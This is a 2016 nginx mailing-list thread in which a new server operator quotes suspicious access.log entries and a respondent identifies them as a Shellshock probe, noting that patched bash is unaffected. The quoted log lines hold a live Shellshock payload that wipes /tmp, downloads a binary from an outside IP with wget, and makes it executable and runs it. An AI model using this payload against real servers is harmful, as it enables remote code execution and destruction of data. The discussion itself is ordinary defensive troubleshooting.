Suspicious log records

Robert Paprocki rpaprocki at fearnothingproductions.net
Sat Oct 22 16:57:03 UTC 2016


Looks like a shellshock attempt. Provided that you're running a modern of version of bash there's nothing to be done. Well, you could drop requests from those IPs if you see fit. 

Welcome to the wild world of running a public server!

> On Oct 22, 2016, at 03:19, janro <nginx-forum at forum.nginx.org> wrote:
> 
> Hi everyone.
> 
> I'm newbie with Nginx and with servers and I thought to ask your opinion
> about the log input I noticed from last night.
> 
> There's clearly a some sort of malicious attempt in access.log which is
> repeated four times. In error.log there's only 'closed keepalive connection'
> records, which matches with those four attempts.
> 
> Everything runs fine on server side. I just like to know that is this just a
> normal day in a world of server logs or something critical that need
> actions?
> 
> Access.log
> 
> 61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo
> /tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo
> chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >>
> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
> /tmp/Run.sh;/tmp/Run.sh\x22" "-"
> 
> 61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
> /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
> 
> 61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
> /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
> 
> 61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "()
> { :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
> -O /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo echo By China.Z >>
> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo
> /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
> \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb
>>> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777
> /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo /tmp/China.Z-xxmb  >>
> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
> /tmp/Run.sh;/tmp/Run.sh\x22" "-"
> 
> Error.log
> 
> 2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed
> keepalive connection
> 2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed
> keepalive connection
> 
> Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472
> 
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx



More information about the nginx mailing list